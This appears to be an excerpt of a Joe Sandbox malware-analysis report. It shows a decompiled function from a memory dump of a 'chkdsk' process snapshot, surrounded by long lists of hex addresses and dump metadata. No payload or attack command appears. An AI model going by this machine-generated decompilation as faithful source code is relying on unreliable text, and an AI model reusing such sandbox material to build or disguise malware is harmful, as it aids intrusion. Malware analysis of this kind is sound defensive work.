                                                      0x04da4582
                                                      0x04dee1ab
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da4588
                                                      0x04da4588
                                                      0x04da458c
                                                      0x04dee1c4
                                                      0x04dee1c4
                                                      0x00000000
                                                      0x04da4592
                                                      0x04da4592
                                                      0x04da4599
                                                      0x04dee1be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da459f
                                                      0x04da459f
                                                      0x04da45a3
                                                      0x04dee1d7
                                                      0x04dee1e4
                                                      0x00000000
                                                      0x04da45a9
                                                      0x04da45a9
                                                      0x04da45b0
                                                      0x04dee1d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45b6
                                                      0x04da45b6
                                                      0x04da45b6
                                                      0x00000000
                                                      0x04da45b6
                                                      0x04da45b0
                                                      0x04da45a3
                                                      0x04da4599
                                                      0x04da458c
                                                      0x04da4582
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da41f4
                                                      0x04da423e
                                                      0x04da4241
                                                      0x04da45c0
                                                      0x04da45c4
                                                      0x00000000
                                                      0x04da45ca
                                                      0x04da45ca
                                                      0x00000000
                                                      0x04dee207
                                                      0x04dee20f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45d1
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45ca
                                                      0x00000000
                                                      0x04da4247
                                                      0x04da4247
                                                      0x04da4247
                                                      0x04da4249
                                                      0x04da4249
                                                      0x04da4249
                                                      0x04da4251
                                                      0x04da4251
                                                      0x04da4257
                                                      0x04da425f
                                                      0x04da426e
                                                      0x04da4270
                                                      0x04da427a
                                                      0x04dee219
                                                      0x04dee219
                                                      0x04da4280
                                                      0x04da4282
                                                      0x04da4456
                                                      0x04da45ea
                                                      0x00000000
                                                      0x04da45f0
                                                      0x04dee223
                                                      0x00000000
                                                      0x04dee223
                                                      0x04da445c
                                                      0x04da445c
                                                      0x00000000
                                                      0x04da445c
                                                      0x00000000
                                                      0x04da4288
                                                      0x04da428c
                                                      0x04dee298
                                                      0x04da4292
                                                      0x04da4292
                                                      0x04da429e
                                                      0x04da42a3
                                                      0x04da42a7
                                                      0x04da42ac
                                                      0x04dee22d
                                                      0x04da42b2
                                                      0x04da42b2
                                                      0x04da42b9
                                                      0x04da42bc
                                                      0x04da42c2
                                                      0x04da42ca
                                                      0x04da42cd
                                                      0x04da42cd
                                                      0x04da42d4
                                                      0x04da433f
                                                      0x04da433f
                                                      0x04da42d6
                                                      0x04da42d6
                                                      0x04da42d9
                                                      0x04da42dd
                                                      0x04da42eb
                                                      0x04dee23a
                                                      0x04da42f1
                                                      0x04da4305
                                                      0x04da430d
                                                      0x04da4315
                                                      0x04da4318
                                                      0x04da431f
                                                      0x04da4322
                                                      0x04da432e
                                                      0x04da433b
                                                      0x04da433b
                                                      0x00000000
                                                      0x04da432e
                                                      0x04da42eb
                                                      0x04da434c
                                                      0x04da434e
                                                      0x04da4352
                                                      0x04da4359
                                                      0x04da435e
                                                      0x04da4361
                                                      0x04da436e
                                                      0x04da438a
                                                      0x04da438e
                                                      0x04da4396
                                                      0x04da439e
                                                      0x04da43a1
                                                      0x04da43ad
                                                      0x04da43bb
                                                      0x04da43bb
                                                      0x04da43ad
                                                      0x04da436e
                                                      0x04da43bf
                                                      0x04da43c5
                                                      0x04da4463
                                                      0x04da4463
                                                      0x04da43ce
                                                      0x04da43d5
                                                      0x04da43d9
                                                      0x04da43df
                                                      0x04da4475
                                                      0x04da4479
                                                      0x04da4491
                                                      0x04da4491
                                                      0x04da4479
                                                      0x04da43e5
                                                      0x04da43eb
                                                      0x04da43f4
                                                      0x04da43f6
                                                      0x04da43f9
                                                      0x04da43fc
                                                      0x04da43ff
                                                      0x04da44e8
                                                      0x04da44ed
                                                      0x04da44f3
                                                      0x04dee247
                                                      0x00000000
                                                      0x04da44f9
                                                      0x04da4504
                                                      0x04da4508
                                                      0x04da450f
                                                      0x04dee269
                                                      0x00000000
                                                      0x04da4515
                                                      0x04da4519
                                                      0x04da4531
                                                      0x04da4534
                                                      0x04da4537
                                                      0x04da453e
                                                      0x04da4541
                                                      0x04da454a
                                                      0x04dee255
                                                      0x04dee255
                                                      0x04dee25b
                                                      0x04dee25e
                                                      0x04dee261
                                                      0x04dee261
                                                      0x04da4555
                                                      0x04da4559
                                                      0x04da455d
                                                      0x04dee26d
                                                      0x04dee270
                                                      0x04dee274
                                                      0x04dee27a
                                                      0x04dee27d
                                                      0x04dee28e
                                                      0x04dee28e
                                                      0x04da4563
                                                      0x04da4563
                                                      0x04da4569
                                                      0x04da4569
                                                      0x00000000
                                                      0x04da455d
                                                      0x04da450f
                                                      0x00000000
                                                      0x04da44f3
                                                      0x04da43ff
                                                      0x04da4405
                                                      0x04da4405
                                                      0x04da4405
                                                      0x04da42ac
                                                      0x04da428c
                                                      0x04da4282
                                                      0x04da4407
                                                      0x04da440d
                                                      0x04dee2af
                                                      0x04dee2af
                                                      0x04da4413
                                                      0x04da4413
                                                      0x00000000
                                                      0x04da41d4
                                                      0x00000000
                                                      0x04da41c3
                                                      0x04da41bd
                                                      0x04da4415
                                                      0x04da4415
                                                      0x04da4416
                                                      0x04da4417
                                                      0x04da4429
                                                      0x04da416e
                                                      0x04da416e
                                                      0x04da4175
                                                      0x04da4498
                                                      0x04da449f
                                                      0x04dee12d
                                                      0x00000000
                                                      0x04dee133
                                                      0x00000000
                                                      0x04dee133
                                                      0x04da44a5
                                                      0x04da44a5
                                                      0x04da44aa
                                                      0x00000000
                                                      0x04da44bb
                                                      0x04da44ca
                                                      0x04da44d6
                                                      0x04da44d7
                                                      0x04da44d8
                                                      0x04da44e3
                                                      0x04da44e3
                                                      0x04da44aa
                                                      0x04da417b
                                                      0x04da417b
                                                      0x04da417b
                                                      0x00000000
                                                      0x04da417b
                                                      0x04da4175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a466b61c1a7238f698c4952d776d341aaba4529ea474f8c9b1dda8b5e4f3ec7e
                                                      • Instruction ID: 5b396c4eaecdf6d46960a3aea775cd201766934901166b7899e1cc61e5cda87d
                                                      • Opcode Fuzzy Hash: a466b61c1a7238f698c4952d776d341aaba4529ea474f8c9b1dda8b5e4f3ec7e
                                                      • Instruction Fuzzy Hash: 86F18F706083118FD724DF19C484A3AB7E1FF88718F04892EF486CB290E7B5E8A1DB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E04DB20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4e78714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04DB2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04DB2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04D858EC(_t240);
									_t221 =  *0x4e75cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4e75cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04DC4A2C(0x4e76e40, 0x4dc4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04DA7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4d65c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04DBF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04DBF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04E07016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04DA2400(_t267 + 0x20);
															}
															L04DA2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04DB2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04DA2280(_t134, 0x4e78608);
									__eflags =  *0x4e76e48 - _t253; // 0x3083f8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04D9FFB0(_t198, _t241, 0x4e78608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4e76e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4e78608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04DB6B90(_t210,  &_v64);
										_t262 =  *0x4e78608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04DBE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04DC97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04DC006A(0x4e78608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4e78608);
												E04DCB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4e76904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4e76e48; // 0x3083f8
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E04D9FFB0(_t198, _t240, 0x4e78608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04DC00C2(0x4e78608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                      0x04db20a0
                                                      0x04db20a8
                                                      0x04db20ad
                                                      0x04db20b3
                                                      0x04db20b8
                                                      0x04db20c2
                                                      0x04db20c7
                                                      0x04db20cb
                                                      0x04db20d2
                                                      0x04db2263
                                                      0x04db2266
                                                      0x04df5836
                                                      0x04df5836
                                                      0x00000000
                                                      0x04db226c
                                                      0x04db226c
                                                      0x04db2270
                                                      0x04db2274
                                                      0x04db20e2
                                                      0x04db20e2
                                                      0x04db20e6
                                                      0x04db20ee
                                                      0x04df57dc
                                                      0x04df57de
                                                      0x04df57ec
                                                      0x04df57ec
                                                      0x04df57f1
                                                      0x04df57f3
                                                      0x04df57f8
                                                      0x00000000
                                                      0x04df57f8
                                                      0x04df57e0
                                                      0x04df57e4
                                                      0x04df57ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df57ea
                                                      0x04db20f4
                                                      0x04db20f4
                                                      0x04db20f8
                                                      0x04db20f8
                                                      0x04db20fc
                                                      0x04db2100
                                                      0x04db2106
                                                      0x04db2201
                                                      0x04db2206
                                                      0x04db220b
                                                      0x04db220e
                                                      0x04db22a9
                                                      0x04db22ac
                                                      0x00000000
                                                      0x00000000
                                                      0x04db22b2
                                                      0x04db22b5
                                                      0x04df5801
                                                      0x04df5806
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5810
                                                      0x04df5815
                                                      0x04df5818
                                                      0x00000000
                                                      0x00000000
                                                      0x04df581e
                                                      0x04db22bb
                                                      0x04db22bb
                                                      0x04db2218
                                                      0x04db2218
                                                      0x04db221c
                                                      0x04db2220
                                                      0x04db2222
                                                      0x04db22c2
                                                      0x04db22c4
                                                      0x04db22dc
                                                      0x04db22dc
                                                      0x04db22e1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04db22e7
                                                      0x04db22c8
                                                      0x04db22cd
                                                      0x04db22d3
                                                      0x04db22d6
                                                      0x04df5823
                                                      0x04df5825
                                                      0x04df5827
                                                      0x00000000
                                                      0x00000000
                                                      0x04df582d
                                                      0x00000000
                                                      0x04df582d
                                                      0x00000000
                                                      0x04db2228
                                                      0x04db2228
                                                      0x00000000
                                                      0x04db2228
                                                      0x04db2222
                                                      0x04db2214
                                                      0x04db2214
                                                      0x00000000
                                                      0x04db2114
                                                      0x04db2114
                                                      0x04db2114
                                                      0x04db211a
                                                      0x04db211c
                                                      0x04db2348
                                                      0x04db234d
                                                      0x04df5840
                                                      0x04df5845
                                                      0x04df5848
                                                      0x04df584e
                                                      0x04df584e
                                                      0x04df5848
                                                      0x04db2353
                                                      0x04db2355
                                                      0x04db2388
                                                      0x04db2388
                                                      0x04db2368
                                                      0x04db236a
                                                      0x04db236c
                                                      0x04db238f
                                                      0x00000000
                                                      0x04db236e
                                                      0x04db236e
                                                      0x04db218e
                                                      0x04db218e
                                                      0x04db2191
                                                      0x04db2195
                                                      0x04df5a03
                                                      0x04df5a06
                                                      0x04df5a0c
                                                      0x04df5a0f
                                                      0x04df5a11
                                                      0x04df5a13
                                                      0x04df5a13
                                                      0x04df5a19
                                                      0x04df5a1f
                                                      0x00000000
                                                      0x04db219b
                                                      0x04db219b
                                                      0x04db21a0
                                                      0x04db2282
                                                      0x04db2284
                                                      0x04db2284
                                                      0x04db2284
                                                      0x04db2284
                                                      0x04db21a6
                                                      0x04db21a9
                                                      0x04db21ac
                                                      0x04db21ae
                                                      0x04db21b3
                                                      0x04db228b
                                                      0x04db2290
                                                      0x04db2379
                                                      0x04db2296
                                                      0x04db2298
                                                      0x04db2298
                                                      0x04db2290
                                                      0x04db21b9
                                                      0x04db21be
                                                      0x04db22a2
                                                      0x04db22a2
                                                      0x04db21c4
                                                      0x04db21c8
                                                      0x04db21cc
                                                      0x04db21d0
                                                      0x04db21d4
                                                      0x04db21de
                                                      0x04db21e3
                                                      0x04df5a29
                                                      0x04df5a2c
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5a3b
                                                      0x00000000
                                                      0x04db21e9
                                                      0x04db21e9
                                                      0x04db21e9
                                                      0x04db21ee
                                                      0x04db21f1
                                                      0x04df5a45
                                                      0x04df5a4b
                                                      0x04df5a52
                                                      0x04df5a58
                                                      0x04df5a5d
                                                      0x04df5a5f
                                                      0x04df5a71
                                                      0x04df5a61
                                                      0x04df5a6a
                                                      0x04df5a6a
                                                      0x04df5a76
                                                      0x04df5a79
                                                      0x04df5a7f
                                                      0x04df5a83
                                                      0x04df5a85
                                                      0x04df5a87
                                                      0x04df5a87
                                                      0x04df5a8c
                                                      0x04df5a91
                                                      0x04df5a97
                                                      0x04df5a9f
                                                      0x04df5aa0
                                                      0x04df5aa1
                                                      0x04df5aa6
                                                      0x04df5aab
                                                      0x04df5ab1
                                                      0x04df5ab3
                                                      0x04df5ab9
                                                      0x04df5aca
                                                      0x04df5ad4
                                                      0x04df5ad4
                                                      0x04df5ade
                                                      0x04df5ade
                                                      0x04df5aab
                                                      0x04df5a79
                                                      0x04df5a52
                                                      0x04db21f7
                                                      0x04db21f9
                                                      0x04db21fe
                                                      0x04db21fe
                                                      0x04db21e3
                                                      0x04db2195
                                                      0x04db236c
                                                      0x04db2122
                                                      0x04db2122
                                                      0x04db2124
                                                      0x04db2231
                                                      0x04db2236
                                                      0x04db2236
                                                      0x04db2238
                                                      0x04db2238
                                                      0x04db2240
                                                      0x04db2242
                                                      0x04db2244
                                                      0x04df59fc
                                                      0x04db218c
                                                      0x04db218c
                                                      0x00000000
                                                      0x04db218c
                                                      0x04db224a
                                                      0x04db224f
                                                      0x04db2256
                                                      0x04db2304
                                                      0x04db2309
                                                      0x04db230f
                                                      0x04db231e
                                                      0x04db231e
                                                      0x04db231e
                                                      0x04db2320
                                                      0x04db2325
                                                      0x04db232a
                                                      0x04db232c
                                                      0x04db233e
                                                      0x04db233e
                                                      0x00000000
                                                      0x04db232c
                                                      0x04db2311
                                                      0x04db2317
                                                      0x04db231a
                                                      0x04db231c
                                                      0x04db2380
                                                      0x04db2380
                                                      0x04db2380
                                                      0x04db2384
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2386
                                                      0x00000000
                                                      0x04db231c
                                                      0x04db225c
                                                      0x04db225c
                                                      0x00000000
                                                      0x04db225c
                                                      0x04db212a
                                                      0x04db2134
                                                      0x04db2138
                                                      0x04db213d
                                                      0x04df5858
                                                      0x04df5863
                                                      0x04df5863
                                                      0x04df5867
                                                      0x04df586a
                                                      0x00000000
                                                      0x00000000
                                                      0x04df586c
                                                      0x04df586c
                                                      0x04df5871
                                                      0x04df5875
                                                      0x04df5877
                                                      0x04df5997
                                                      0x04df599c
                                                      0x04df59a1
                                                      0x04df59a7
                                                      0x04df59a7
                                                      0x00000000
                                                      0x04df59a7
                                                      0x04df587d
                                                      0x00000000
                                                      0x04df588b
                                                      0x04df588b
                                                      0x04df5890
                                                      0x04df5892
                                                      0x04df5894
                                                      0x04df5899
                                                      0x04df589b
                                                      0x04df58a0
                                                      0x04df58a0
                                                      0x04df58aa
                                                      0x04df58b2
                                                      0x04df58b6
                                                      0x04df58be
                                                      0x04df58c6
                                                      0x04df58c9
                                                      0x04df590d
                                                      0x04df5917
                                                      0x04df591a
                                                      0x04df591c
                                                      0x04df5920
                                                      0x04df5928
                                                      0x04df592a
                                                      0x04df592c
                                                      0x04df592e
                                                      0x04df592e
                                                      0x04df58cb
                                                      0x04df58cd
                                                      0x04df58d8
                                                      0x04df58e0
                                                      0x04df58f4
                                                      0x04df58fe
                                                      0x04df58fe
                                                      0x04df593a
                                                      0x04df593e
                                                      0x04df5940
                                                      0x04df5942
                                                      0x00000000
                                                      0x04df5944
                                                      0x04df5944
                                                      0x04df5949
                                                      0x04df594e
                                                      0x04df594e
                                                      0x04df5953
                                                      0x04df595b
                                                      0x04df5976
                                                      0x04df5976
                                                      0x04df597a
                                                      0x04df597f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5981
                                                      0x04df5981
                                                      0x04df5981
                                                      0x04df5983
                                                      0x04df5988
                                                      0x04df598d
                                                      0x04df5991
                                                      0x04df5991
                                                      0x00000000
                                                      0x04df595d
                                                      0x04df595d
                                                      0x04df5963
                                                      0x04df5965
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5967
                                                      0x04df5967
                                                      0x04df596b
                                                      0x04df596d
                                                      0x00000000
                                                      0x00000000
                                                      0x04df596f
                                                      0x04df5971
                                                      0x04df5971
                                                      0x04df5974
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5974
                                                      0x00000000
                                                      0x04df5967
                                                      0x04df595b
                                                      0x04df5942
                                                      0x04df5863
                                                      0x04db2143
                                                      0x04db2143
                                                      0x04db2149
                                                      0x04db214f
                                                      0x04db22ec
                                                      0x04db22f1
                                                      0x04db22f6
                                                      0x00000000
                                                      0x04db22f6
                                                      0x04db2159
                                                      0x04db2173
                                                      0x04db2173
                                                      0x04db217d
                                                      0x04db2181
                                                      0x04db2186
                                                      0x04df59ae
                                                      0x04df59b2
                                                      0x04df59b5
                                                      0x04df59b7
                                                      0x04df59ba
                                                      0x04df59cd
                                                      0x04df59d1
                                                      0x04df59d5
                                                      0x04df59d9
                                                      0x04df59db
                                                      0x00000000
                                                      0x00000000
                                                      0x04df59dd
                                                      0x04df59dd
                                                      0x04df59e1
                                                      0x04df59e4
                                                      0x04df59e7
                                                      0x04df59ee
                                                      0x04df59ee
                                                      0x04df59f3
                                                      0x04df59f3
                                                      0x00000000
                                                      0x04db2186
                                                      0x04db2164
                                                      0x04db216d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04db216d
                                                      0x04db2106
                                                      0x04db2266
                                                      0x04db20d8
                                                      0x04db20da
                                                      0x04db20e0
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
